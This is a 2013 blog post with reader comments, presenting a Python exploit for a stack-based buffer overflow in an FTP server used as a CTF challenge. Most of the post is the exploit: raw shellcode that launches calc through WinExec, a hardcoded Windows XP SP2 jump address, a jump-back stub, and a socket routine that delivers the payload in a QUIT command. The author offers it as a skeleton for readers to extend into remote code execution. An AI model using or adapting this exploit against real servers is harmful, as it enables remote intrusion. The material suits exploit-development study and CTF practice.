Monday, June 17, 2013

IDSECCONF 2013 ctf offline: exploitation challenge (500) exploit

This is the exploit code for exploiting the stack-based buffer overflow in myftpd (500 point exploitation challenge) during the IDSECCONF offline CTF, none of the team were able to wrap up a working remote exploit, altough one team were able to get correct offset to overwrite EIP, but that didn't give them any point (unless, for e.g: able to call winexec and launching calc, even if they were not able to do the remote shell)

And for all the team that played yesterday, you can use this skeleton (only with calc payload) exploit to wrap up your remote-code-execution exploit and get the flag.txt file at Desktop directory (inside the Windows VM you are copying).

And as for the hint, still the same, you will have very limited chars (many bad chars) and limited space (best bet is to craft your own shellcode). Good luck and enjoy!

#!/usr/bin/env python

from socket import *
import sys
from time import sleep


if len(sys.argv) != 3:
    print "[-]Usage: python %s <ip> <port>" % sys.argv[0]
    sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])

#winexec calc taken from : http://code.google.com/p/win-exec-calc-shellcode/
shellcode=("\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x0F\xB7\x2C\x51\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF1\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7\xCC")

#jmp esp 7c941eed win xp pro sp 2

payload  ="\x90"*50+shellcode+"\x90"*(234-len(shellcode))+"\xed\x1e\x94\x7c"
payload +="\x90"*14
#let's use kewl way to jump back 256 using ecx
payload +="\x33\xc9" #XOR ECX,ECX
payload +="\x54" #PUSH ESP
payload +="\x59" #POP ECX
payload +="\xfe\xcd" #DEC CH, jumpback 256 \m/
payload +="\xff\xe1" #JMP ECX

print "[+]Connecting with server..."
sleep(1)

try:
    s = socket(AF_INET,SOCK_STREAM)
    s.connect((ip,port))
    s.recv(1024)
    s.send("USER test\r\n")
    s.recv(1024)
    s.send("PASS test\r\n")
    s.recv(1024)
    s.send("QUIT "+payload+"\r\n")
    s.close()
    print "[+]Exploit Success!"
except:
    print "[*]Exploit Failed, Cannot connect to server: "+ip

Update: OJ creates an excellent write-up about this challenge here, thanks mate.


6 comments:

  1. @Vnspl0it: Hi, U'r welcome :)

    ReplyDelete
  2. Are the binaries available for download? I wouldn't mind attempting this myself.

    ReplyDelete
  3. @OJ: hi, it's actually a modified version of "some" ftp server, feel free to get it and try it from here https://www.dropbox.com/sh/cldqxp2kxcitfyv/LL5SWQxmvg, cant wait your write up :)

    ReplyDelete
  4. Hey Ammar,

    Can you please email me on oj@buffered.io ? :) I'd like to share my exploit with you. Write up coming soon.

    OJ

    ReplyDelete
  5. @OJ: thats a very nice write up and exploit, thanks mate.

    ReplyDelete